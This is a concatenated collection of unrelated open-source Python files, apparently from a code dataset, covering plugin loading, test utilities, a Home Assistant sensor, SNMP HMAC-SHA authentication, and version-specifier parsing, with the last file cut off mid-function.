bytes_time = BenchTimer("__main__.%s(__main__.BYTES)" % (k,),
"import __main__").best(REPEAT)
bytes_time_s = "%.2f" % (1000 * bytes_time)
bytes_total += bytes_time
except UnsupportedType:
bytes_time_s = "N/A"
uni_time = 0.0
uni_time_s = " - "
if not options.bytes_only:
try:
uni_time = BenchTimer("__main__.%s(__main__.UNICODE)" % (k,),
"import __main__").best(REPEAT)
uni_time_s = "%.2f" % (1000 * uni_time)
uni_total += uni_time
except UnsupportedType:
uni_time_s = "N/A"
try:
average = bytes_time/uni_time
except (TypeError, ZeroDivisionError):
average = 0.0
p("%s\t%s\t%.1f\t%s (*%d)" % (
bytes_time_s, uni_time_s, 100.*average,
v.comment, v.repeat_count))
if bytes_total == uni_total == 0.0:
p("That was zippy!")
else:
try:
ratio = bytes_total/uni_total
except ZeroDivisionError:
ratio = 0.0
p("%.2f\t%.2f\t%.1f\t%s" % (
1000*bytes_total, 1000*uni_total, 100.*ratio,
"TOTAL"))
if __name__ == "__main__":
main()
| apache-2.0 |
cneill/designate | designate/plugin.py | 8 | 4112 | # Copyright 2012 Bouvet ASA
#
# Author: Endre Karlson <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from stevedore import driver
from stevedore import enabled
from stevedore import extension
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
@six.add_metaclass(abc.ABCMeta)
class Plugin(object):
__plugin_ns__ = None
__plugin_name__ = None
__plugin_type__ = None
def __init__(self):
self.name = self.get_canonical_name()
LOG.debug("Loaded plugin %s" % self.name)
@classmethod
def get_canonical_name(cls):
"""
Return the plugin name
"""
type_ = cls.get_plugin_type()
name = cls.get_plugin_name()
return "%s:%s" % (type_, name)
@classmethod
def get_plugin_name(cls):
return cls.__plugin_name__
@classmethod
def get_plugin_type(cls):
return cls.__plugin_type__
@classmethod
def get_cfg_opts(cls):
"""Get any static configuration options
Returns an array of tuples in the form:
[(group1, [Option1, Option2]), (group2, [Option1, Option2])]
"""
return []
@classmethod
def get_extra_cfg_opts(cls):
"""Get any dynamically built configuration options
Returns an array of tuples in the form:
[(group1, [Option1, Option2]), (group2, [Option1, Option2])]
"""
return []
@classmethod
def register_cfg_opts(cls, namespace):
mgr = extension.ExtensionManager(namespace)
for e in mgr:
for group, opts in e.plugin.get_cfg_opts():
if isinstance(group, six.string_types):
group = cfg.OptGroup(name=group)
CONF.register_group(group)
CONF.register_opts(opts, group=group)
@classmethod
def register_extra_cfg_opts(cls, namespace):
mgr = extension.ExtensionManager(namespace)
for e in mgr:
for group, opts in e.plugin.get_extra_cfg_opts():
if isinstance(group, six.string_types):
group = cfg.OptGroup(name=group)
CONF.register_group(group)
CONF.register_opts(opts, group=group)
class DriverPlugin(Plugin):
"""
A Driver plugin is a singleton, where only a single driver will loaded
at a time.
For example: Storage implementations (SQLAlchemy)
"""
@classmethod
def get_driver(cls, name):
"""Load a single driver"""
LOG.debug('Looking for driver %s in %s' % (name, cls.__plugin_ns__))
mgr = driver.DriverManager(cls.__plugin_ns__, name)
return mgr.driver
class ExtensionPlugin(Plugin):
"""
Extension plugins are loaded as a group, where multiple extensions will
be loaded and used at the same time.
For example: Designate Sink handlers
"""
@classmethod
def get_extensions(cls, enabled_extensions=None):
"""Load a series of extensions"""
LOG.debug('Looking for extensions in %s' % cls.__plugin_ns__)
def _check_func(ext):
if enabled_extensions is None:
# All extensions are enabled by default, if no specific list
# is specified
return True
return ext.plugin.get_plugin_name() in enabled_extensions
mgr = enabled.EnabledExtensionManager(
cls.__plugin_ns__, check_func=_check_func,
propagate_map_exceptions=True)
return [e.plugin for e in mgr]
| apache-2.0 |
yury-s/v8-inspector | Source/chrome/tools/telemetry/telemetry/results/csv_pivot_table_output_formatter_unittest.py | 20 | 3349 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import StringIO
import unittest
from telemetry import page as page_module
from telemetry.page import page_set
from telemetry.results import csv_pivot_table_output_formatter
from telemetry.results import page_test_results
from telemetry.value import scalar
def _MakePageSet():
ps = page_set.PageSet(file_path=os.path.dirname(__file__))
ps.AddUserStory(page_module.Page('http://www.foo.com/', ps, ps.base_dir))
ps.AddUserStory(page_module.Page('http://www.bar.com/', ps, ps.base_dir))
return ps
class CsvPivotTableOutputFormatterTest(unittest.TestCase):
# The line separator used by CSV formatter.
_LINE_SEPARATOR = '\r\n'
def setUp(self):
self._output = StringIO.StringIO()
self._page_set = _MakePageSet()
self._results = page_test_results.PageTestResults()
self._formatter = None
self.MakeFormatter()
def MakeFormatter(self, trace_tag=''):
self._formatter = (
csv_pivot_table_output_formatter.CsvPivotTableOutputFormatter(
self._output, trace_tag))
def SimulateBenchmarkRun(self, dict_of_values):
"""Simulate one run of a benchmark, using the supplied values.
Args:
dict_of_values: dictionary w/ Page instance as key, a list of Values
as value.
"""
for page, values in dict_of_values.iteritems():
self._results.WillRunPage(page)
for v in values:
v.page = page
self._results.AddValue(v)
self._results.DidRunPage(page)
def Format(self):
self._formatter.Format(self._results)
return self._output.getvalue()
def testSimple(self):
# Test a simple benchmark with only one value:
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 3)]})
expected = self._LINE_SEPARATOR.join([
'page_set,page,name,value,units,run_index',
'page_set,http://www.foo.com/,foo,3,seconds,0',
''])
self.assertEqual(expected, self.Format())
def testMultiplePagesAndValues(self):
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 4)],
self._page_set[1]: [scalar.ScalarValue(None, 'foo', 'seconds', 3.4),
scalar.ScalarValue(None, 'bar', 'km', 10),
scalar.ScalarValue(None, 'baz', 'count', 5)]})
# Parse CSV output into list of lists.
csv_string = self.Format()
lines = csv_string.split(self._LINE_SEPARATOR)
values = [s.split(',') for s in lines[1:-1]]
self.assertEquals(len(values), 4) # We expect 4 value in total.
self.assertEquals(len(set((v[1] for v in values))), 2) # 2 pages.
self.assertEquals(len(set((v[2] for v in values))), 3) # 3 value names.
def testTraceTag(self):
self.MakeFormatter(trace_tag='date,option')
self.SimulateBenchmarkRun({
self._page_set[0]: [scalar.ScalarValue(None, 'foo', 'seconds', 3),
scalar.ScalarValue(None, 'bar', 'tons', 5)]})
output = self.Format().split(self._LINE_SEPARATOR)
self.assertTrue(output[0].endswith(',trace_tag_0,trace_tag_1'))
for line in output[1:-1]:
self.assertTrue(line.endswith(',date,option'))
| bsd-3-clause |
Cinntax/home-assistant | homeassistant/components/uscis/sensor.py | 2 | 2273 | """Support for USCIS Case Status."""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers import config_validation as cv
from homeassistant.const import CONF_FRIENDLY_NAME
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = "USCIS"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Required("case_id"): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the platform in HASS and Case Information."""
uscis = UscisSensor(config["case_id"], config[CONF_FRIENDLY_NAME])
uscis.update()
if uscis.valid_case_id:
add_entities([uscis])
else:
_LOGGER.error("Setup USCIS Sensor Fail" " check if your Case ID is Valid")
class UscisSensor(Entity):
"""USCIS Sensor will check case status on daily basis."""
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=24)
CURRENT_STATUS = "current_status"
LAST_CASE_UPDATE = "last_update_date"
def __init__(self, case, name):
"""Initialize the sensor."""
self._state = None
self._case_id = case
self._attributes = None
self.valid_case_id = None
self._name = name
@property
def name(self):
"""Return the name."""
return self._name
@property
def state(self):
"""Return the state."""
return self._state
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Fetch data from the USCIS website and update state attributes."""
import uscisstatus
try:
status = uscisstatus.get_case_status(self._case_id)
self._attributes = {self.CURRENT_STATUS: status["status"]}
self._state = status["date"]
self.valid_case_id = True
except ValueError:
_LOGGER("Please Check that you have valid USCIS case id")
self.valid_case_id = False
| apache-2.0 |
fransklaver/linux | tools/perf/scripts/python/failed-syscalls-by-pid.py | 1996 | 2233 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
common_callchain, id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
raw_syscalls__sys_exit(**locals())
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
takeshineshiro/swift | test/probe/brain.py | 8 | 8163 | #!/usr/bin/python -u
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import itertools
import uuid
from optparse import OptionParser
from urlparse import urlparse
import random
import six
from swift.common.manager import Manager
from swift.common import utils, ring
from swift.common.storage_policy import POLICIES
from swift.common.http import HTTP_NOT_FOUND
from swiftclient import client, get_auth, ClientException
from test.probe.common import ENABLED_POLICIES
TIMEOUT = 60
def meta_command(name, bases, attrs):
"""
Look for attrs with a truthy attribute __command__ and add them to an
attribute __commands__ on the type that maps names to decorated methods.
The decorated methods' doc strings also get mapped in __docs__.
Also adds a method run(command_name, *args, **kwargs) that will
execute the method mapped to the name in __commands__.
"""
commands = {}
docs = {}
for attr, value in attrs.items():
if getattr(value, '__command__', False):
commands[attr] = value
# methods have always have a __doc__ attribute, sometimes empty
docs[attr] = (getattr(value, '__doc__', None) or
'perform the %s command' % attr).strip()
attrs['__commands__'] = commands
attrs['__docs__'] = docs
def run(self, command, *args, **kwargs):
return self.__commands__[command](self, *args, **kwargs)
attrs.setdefault('run', run)
return type(name, bases, attrs)
def command(f):
f.__command__ = True
return f
@six.add_metaclass(meta_command)
class BrainSplitter(object):
def __init__(self, url, token, container_name='test', object_name='test',
server_type='container', policy=None):
self.url = url
self.token = token
self.account = utils.split_path(urlparse(url).path, 2, 2)[1]
self.container_name = container_name
self.object_name = object_name
server_list = ['%s-server' % server_type] if server_type else ['all']
self.servers = Manager(server_list)
policies = list(ENABLED_POLICIES)
random.shuffle(policies)
self.policies = itertools.cycle(policies)
o = object_name if server_type == 'object' else None
c = container_name if server_type in ('object', 'container') else None
if server_type in ('container', 'account'):
if policy:
raise TypeError('Metadata server brains do not '
'support specific storage policies')
self.policy = None
self.ring = ring.Ring(
'/etc/swift/%s.ring.gz' % server_type)
elif server_type == 'object':
if not policy:
raise TypeError('Object BrainSplitters need to '
'specify the storage policy')
self.policy = policy
policy.load_ring('/etc/swift')
self.ring = policy.object_ring
else:
raise ValueError('Unkonwn server_type: %r' % server_type)
self.server_type = server_type
part, nodes = self.ring.get_nodes(self.account, c, o)
node_ids = [n['id'] for n in nodes]
if all(n_id in node_ids for n_id in (0, 1)):
self.primary_numbers = (1, 2)
self.handoff_numbers = (3, 4)
else:
self.primary_numbers = (3, 4)
self.handoff_numbers = (1, 2)
@command
def start_primary_half(self):
"""
start servers 1 & 2
"""
tuple(self.servers.start(number=n) for n in self.primary_numbers)
@command
def stop_primary_half(self):
"""
stop servers 1 & 2
"""
tuple(self.servers.stop(number=n) for n in self.primary_numbers)
@command
def start_handoff_half(self):
"""
start servers 3 & 4
"""
tuple(self.servers.start(number=n) for n in self.handoff_numbers)
@command
def stop_handoff_half(self):
"""
stop servers 3 & 4
"""
tuple(self.servers.stop(number=n) for n in self.handoff_numbers)
@command
def put_container(self, policy_index=None):
"""
put container with next storage policy
"""
policy = next(self.policies)
if policy_index is not None:
policy = POLICIES.get_by_index(int(policy_index))
if not policy:
raise ValueError('Unknown policy with index %s' % policy)
headers = {'X-Storage-Policy': policy.name}
client.put_container(self.url, self.token, self.container_name,
headers=headers)
@command
def delete_container(self):
"""
delete container
"""
client.delete_container(self.url, self.token, self.container_name)
@command
def put_object(self, headers=None):
"""
issue put for zero byte test object
"""
client.put_object(self.url, self.token, self.container_name,
self.object_name, headers=headers)
@command
def delete_object(self):
"""
issue delete for test object
"""
try:
client.delete_object(self.url, self.token, self.container_name,
self.object_name)
except ClientException as err:
if err.http_status != HTTP_NOT_FOUND:
raise
parser = OptionParser('%prog [options] '
'<command>[:<args>[,<args>...]] [<command>...]')
parser.usage += '\n\nCommands:\n\t' + \
'\n\t'.join("%s - %s" % (name, doc) for name, doc in
BrainSplitter.__docs__.items())
parser.add_option('-c', '--container', default='container-%s' % uuid.uuid4(),
help='set container name')
parser.add_option('-o', '--object', default='object-%s' % uuid.uuid4(),
help='set object name')
parser.add_option('-s', '--server_type', default='container',
help='set server type')
parser.add_option('-P', '--policy_name', default=None,
help='set policy')
def main():
options, commands = parser.parse_args()
if not commands:
parser.print_help()
return 'ERROR: must specify at least one command'
for cmd_args in commands:
cmd = cmd_args.split(':', 1)[0]
if cmd not in BrainSplitter.__commands__:
parser.print_help()
return 'ERROR: unknown command %s' % cmd
url, token = get_auth('http://127.0.0.1:8080/auth/v1.0',
'test:tester', 'testing')
if options.server_type == 'object' and not options.policy_name:
options.policy_name = POLICIES.default.name
if options.policy_name:
options.server_type = 'object'
policy = POLICIES.get_by_name(options.policy_name)
if not policy:
return 'ERROR: unknown policy %r' % options.policy_name
else:
policy = None
brain = BrainSplitter(url, token, options.container, options.object,
options.server_type, policy=policy)
for cmd_args in commands:
parts = cmd_args.split(':', 1)
command = parts[0]
if len(parts) > 1:
args = utils.list_from_csv(parts[1])
else:
args = ()
try:
brain.run(command, *args)
except ClientException as e:
print('**WARNING**: %s raised %s' % (command, e))
print('STATUS'.join(['*' * 25] * 2))
brain.servers.status()
sys.exit()
if __name__ == "__main__":
sys.exit(main())
| apache-2.0 |
seblefevre/testerman | core/snmp/pysnmp/proto/secmod/rfc3414/auth/hmacsha.py | 2 | 3023 | try:
from hashlib import sha1
except ImportError:
import sha
sha1 = sha.new
import string
from pysnmp.proto.secmod.rfc3414.auth import base
from pysnmp.proto import error
_twelveZeros = '\x00'*12
_fortyFourZeros = '\x00'*44
# 7.2.4
class HmacSha(base.AbstractAuthenticationService):
serviceID = (1, 3, 6, 1, 6, 3, 10, 1, 1, 3) # usmHMACSHAAuthProtocol
__ipad = [0x36]*64
__opad = [0x5C]*64
# 7.3.1
def authenticateOutgoingMsg(self, authKey, wholeMsg):
# 7.3.1.1
# Here we expect calling secmod to indicate where the digest
# should be in the substrate. Also, it pre-sets digest placeholder
# so we hash wholeMsg out of the box.
# Yes, that's ugly but that's rfc...
l = string.find(wholeMsg, _twelveZeros)
if l == -1:
raise error.ProtocolError('Cant locate digest placeholder')
wholeHead = wholeMsg[:l]
wholeTail = wholeMsg[l+12:]
# 7.3.1.2a
extendedAuthKey = map(ord, str(authKey) + _fortyFourZeros)
# 7.3.1.2b -- noop
# 7.3.1.2c
k1 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__ipad), ''
)
# 7.3.1.2d -- noop
# 7.3.1.2e
k2 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__opad), ''
)
# 7.3.1.3
d1 = sha1(k1+wholeMsg).digest()
# 7.3.1.4
d2 = sha1(k2+d1).digest()
mac = d2[:12]
# 7.3.1.5 & 6
return '%s%s%s' % (wholeHead, mac, wholeTail)
# 7.3.2
def authenticateIncomingMsg(self, authKey, authParameters, wholeMsg):
# 7.3.2.1 & 2
if len(authParameters) != 12:
raise error.StatusInformation(
errorIndication='authenticationError'
)
# 7.3.2.3
l = string.find(wholeMsg, str(authParameters))
if l == -1:
raise error.ProtocolError('Cant locate digest in wholeMsg')
wholeHead = wholeMsg[:l]
wholeTail = wholeMsg[l+12:]
authenticatedWholeMsg = '%s%s%s' % (
wholeHead, _twelveZeros, wholeTail
)
# 7.3.2.4a
extendedAuthKey = map(ord, str(authKey) + _fortyFourZeros)
# 7.3.2.4b --> noop
# 7.3.2.4c
k1 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__ipad), ''
)
# 7.3.2.4d --> noop
# 7.3.2.4e
k2 = string.join(
map(lambda x,y: chr(x^y), extendedAuthKey, self.__opad), ''
)
# 7.3.2.5a
d1 = sha1(k1+authenticatedWholeMsg).digest()
# 7.3.2.5b
d2 = sha1(k2+d1).digest()
# 7.3.2.5c
mac = d2[:12]
# 7.3.2.6
if mac != authParameters:
raise error.StatusInformation(
errorIndication='authenticationFailure'
)
return authenticatedWholeMsg
| gpl-2.0 |
asimshankar/tensorflow | tensorflow/python/kernel_tests/zero_division_test.py | 6 | 2466 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for integer division by zero."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ZeroDivisionTest(test.TestCase):
@test_util.run_deprecated_v1
def testZeros(self):
with test_util.use_gpu():
for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:
zero = constant_op.constant(0, dtype=dtype)
one = constant_op.constant(1, dtype=dtype)
bads = [one // zero]
if dtype in (dtypes.int32, dtypes.int64):
bads.append(one % zero)
for bad in bads:
try:
result = self.evaluate(bad)
except errors_impl.OpError as e:
# Ideally, we'd get a nice exception. In theory, this should only
# happen on CPU, but 32 bit integer GPU division is actually on
# CPU due to a placer bug.
# TODO(irving): Make stricter once the placer bug is fixed.
self.assertIn('Integer division by zero', str(e))
else:
# On the GPU, integer division by zero produces all bits set.
# But apparently on some GPUs "all bits set" for 64 bit division
# means 32 bits set, so we allow 0xffffffff as well. This isn't
# very portable, so we may need to expand this list if other GPUs
# do different things.
self.assertTrue(test.is_gpu_available())
self.assertIn(result, (-1, 0xff, 0xffffffff))
if __name__ == '__main__':
test.main()
| apache-2.0 |
astaninger/speakout | venv/lib/python3.6/site-packages/pkg_resources/_vendor/packaging/specifiers.py | 1107 | 28025 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import abc
import functools
import itertools
import re
from ._compat import string_types, with_metaclass
from .version import Version, LegacyVersion, parse
class InvalidSpecifier(ValueError):
"""
An invalid specifier was found, users should refer to PEP 440.
"""
class BaseSpecifier(with_metaclass(abc.ABCMeta, object)):
@abc.abstractmethod
def __str__(self):
"""
Returns the str representation of this Specifier like object. This
should be representative of the Specifier itself.
"""
@abc.abstractmethod
def __hash__(self):
"""
Returns a hash value for this Specifier like object.
"""
@abc.abstractmethod
def __eq__(self, other):
"""
Returns a boolean representing whether or not the two Specifier like
objects are equal.
"""
@abc.abstractmethod
def __ne__(self, other):
"""
Returns a boolean representing whether or not the two Specifier like
objects are not equal.
"""
@abc.abstractproperty
def prereleases(self):
"""
Returns whether or not pre-releases as a whole are allowed by this
specifier.
"""
@prereleases.setter
def prereleases(self, value):
"""
Sets whether or not pre-releases as a whole are allowed by this
specifier.
"""
@abc.abstractmethod
def contains(self, item, prereleases=None):
"""
Determines if the given item is contained within this specifier.
"""
@abc.abstractmethod
def filter(self, iterable, prereleases=None):
"""
Takes an iterable of items and filters them so that only items which
are contained within this specifier are allowed in it.
"""
class _IndividualSpecifier(BaseSpecifier):
_operators = {}
def __init__(self, spec="", prereleases=None):
match = self._regex.search(spec)
if not match:
raise InvalidSpecifier("Invalid specifier: '{0}'".format(spec))
self._spec = (
match.group("operator").strip(),
match.group("version").strip(),
)
# Store whether or not this Specifier should accept prereleases
self._prereleases = prereleases
def __repr__(self):
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<{0}({1!r}{2})>".format(
self.__class__.__name__,
str(self),
pre,
)
def __str__(self):
return "{0}{1}".format(*self._spec)
def __hash__(self):
return hash(self._spec)
def __eq__(self, other):
if isinstance(other, string_types):
try:
other = self.__class__(other)
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, self.__class__):
return NotImplemented
return self._spec == other._spec
def __ne__(self, other):
if isinstance(other, string_types):
try:
other = self.__class__(other)
except InvalidSpecifier:
return NotImplemented
elif not isinstance(other, self.__class__):
return NotImplemented
return self._spec != other._spec
def _get_operator(self, op):
return getattr(self, "_compare_{0}".format(self._operators[op]))
def _coerce_version(self, version):
if not isinstance(version, (LegacyVersion, Version)):
version = parse(version)
return version
@property
def operator(self):
return self._spec[0]
@property
def version(self):
return self._spec[1]
@property
def prereleases(self):
return self._prereleases
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
def __contains__(self, item):
return self.contains(item)
def contains(self, item, prereleases=None):
# Determine if prereleases are to be allowed or not.
if prereleases is None:
prereleases = self.prereleases
# Normalize item to a Version or LegacyVersion, this allows us to have
# a shortcut for ``"2.0" in Specifier(">=2")
item = self._coerce_version(item)
# Determine if we should be supporting prereleases in this specifier
# or not, if we do not support prereleases than we can short circuit
# logic if this version is a prereleases.
if item.is_prerelease and not prereleases:
return False
# Actually do the comparison to determine if this item is contained
# within this Specifier or not.
return self._get_operator(self.operator)(item, self.version)
def filter(self, iterable, prereleases=None):
yielded = False
found_prereleases = []
kw = {"prereleases": prereleases if prereleases is not None else True}
# Attempt to iterate over all the values in the iterable and if any of
# them match, yield them.
for version in iterable:
parsed_version = self._coerce_version(version)
if self.contains(parsed_version, **kw):
# If our version is a prerelease, and we were not set to allow
# prereleases, then we'll store it for later incase nothing
# else matches this specifier.
if (parsed_version.is_prerelease and not
(prereleases or self.prereleases)):
found_prereleases.append(version)
# Either this is not a prerelease, or we should have been
# accepting prereleases from the begining.
else:
yielded = True
yield version
# Now that we've iterated over everything, determine if we've yielded
# any values, and if we have not and we have any prereleases stored up
# then we will go ahead and yield the prereleases.
if not yielded and found_prereleases:
for version in found_prereleases:
yield version
class LegacySpecifier(_IndividualSpecifier):
_regex_str = (
r"""
(?P<operator>(==|!=|<=|>=|<|>))
\s*
(?P<version>
[^,;\s)]* # Since this is a "legacy" specifier, and the version
# string can be just about anything, we match everything
# except for whitespace, a semi-colon for marker support,
# a closing paren since versions can be enclosed in
# them, and a comma since it's a version separator.
)
"""
)
_regex = re.compile(
r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE)
_operators = {
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
}
def _coerce_version(self, version):
if not isinstance(version, LegacyVersion):
version = LegacyVersion(str(version))
return version
def _compare_equal(self, prospective, spec):
return prospective == self._coerce_version(spec)
def _compare_not_equal(self, prospective, spec):
return prospective != self._coerce_version(spec)
def _compare_less_than_equal(self, prospective, spec):
return prospective <= self._coerce_version(spec)
def _compare_greater_than_equal(self, prospective, spec):
return prospective >= self._coerce_version(spec)
def _compare_less_than(self, prospective, spec):
return prospective < self._coerce_version(spec)
def _compare_greater_than(self, prospective, spec):
return prospective > self._coerce_version(spec)
def _require_version_compare(fn):
@functools.wraps(fn)
def wrapped(self, prospective, spec):
if not isinstance(prospective, Version):
return False
return fn(self, prospective, spec)
return wrapped
class Specifier(_IndividualSpecifier):
_regex_str = (
r"""
(?P<operator>(~=|==|!=|<=|>=|<|>|===))
(?P<version>
(?:
# The identity operators allow for an escape hatch that will
# do an exact string match of the version you wish to install.
# This will not be parsed by PEP 440 and we cannot determine
# any semantic meaning from it. This operator is discouraged
# but included entirely as an escape hatch.
(?<====) # Only match for the identity operator
\s*
[^\s]* # We just match everything, except for whitespace
# since we are only testing for strict identity.
)
|
(?:
# The (non)equality operators allow for wild card and local
# versions to be specified so we have to define these two
# operators separately to enable that.
(?<===|!=) # Only match for equals and not equals
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)* # release
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
# You cannot use a wild card and a dev or local version
# together so group them with a | and make them optional.
(?:
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
(?:\+[a-z0-9]+(?:[-_\.][a-z0-9]+)*)? # local
|
\.\* # Wild card syntax of .*
)?
)
|
(?:
# The compatible operator requires at least two digits in the
# release segment.
(?<=~=) # Only match for the compatible operator
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)+ # release (We have a + instead of a *)
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
)
|
(?:
# All other operators only allow a sub set of what the
# (non)equality operators do. Specifically they do not allow
# local versions to be specified nor do they allow the prefix
# matching wild cards.
(?<!==|!=|~=) # We have special cases for these
# operators so we want to make sure they
# don't match here.
\s*
v?
(?:[0-9]+!)? # epoch
[0-9]+(?:\.[0-9]+)* # release
(?: # pre release
[-_\.]?
(a|b|c|rc|alpha|beta|pre|preview)
[-_\.]?
[0-9]*
)?
(?: # post release
(?:-[0-9]+)|(?:[-_\.]?(post|rev|r)[-_\.]?[0-9]*)
)?
(?:[-_\.]?dev[-_\.]?[0-9]*)? # dev release
)
)
"""
)
_regex = re.compile(
r"^\s*" + _regex_str + r"\s*$", re.VERBOSE | re.IGNORECASE)
_operators = {
"~=": "compatible",
"==": "equal",
"!=": "not_equal",
"<=": "less_than_equal",
">=": "greater_than_equal",
"<": "less_than",
">": "greater_than",
"===": "arbitrary",
}
@_require_version_compare
def _compare_compatible(self, prospective, spec):
# Compatible releases have an equivalent combination of >= and ==. That
# is that ~=2.2 is equivalent to >=2.2,==2.*. This allows us to
# implement this in terms of the other specifiers instead of
# implementing it ourselves. The only thing we need to do is construct
# the other specifiers.
# We want everything but the last item in the version, but we want to
# ignore post and dev releases and we want to treat the pre-release as
# it's own separate segment.
prefix = ".".join(
list(
itertools.takewhile(
lambda x: (not x.startswith("post") and not
x.startswith("dev")),
_version_split(spec),
)
)[:-1]
)
# Add the prefix notation to the end of our string
prefix += ".*"
return (self._get_operator(">=")(prospective, spec) and
self._get_operator("==")(prospective, prefix))
@_require_version_compare
def _compare_equal(self, prospective, spec):
# We need special logic to handle prefix matching
if spec.endswith(".*"):
# In the case of prefix matching we want to ignore local segment.
prospective = Version(prospective.public)
# Split the spec out by dots, and pretend that there is an implicit
# dot in between a release segment and a pre-release segment.
spec = _version_split(spec[:-2]) # Remove the trailing .*
# Split the prospective version out by dots, and pretend that there
# is an implicit dot in between a release segment and a pre-release
# segment.
prospective = _version_split(str(prospective))
# Shorten the prospective version to be the same length as the spec
# so that we can determine if the specifier is a prefix of the
# prospective version or not.
prospective = prospective[:len(spec)]
# Pad out our two sides with zeros so that they both equal the same
# length.
spec, prospective = _pad_version(spec, prospective)
else:
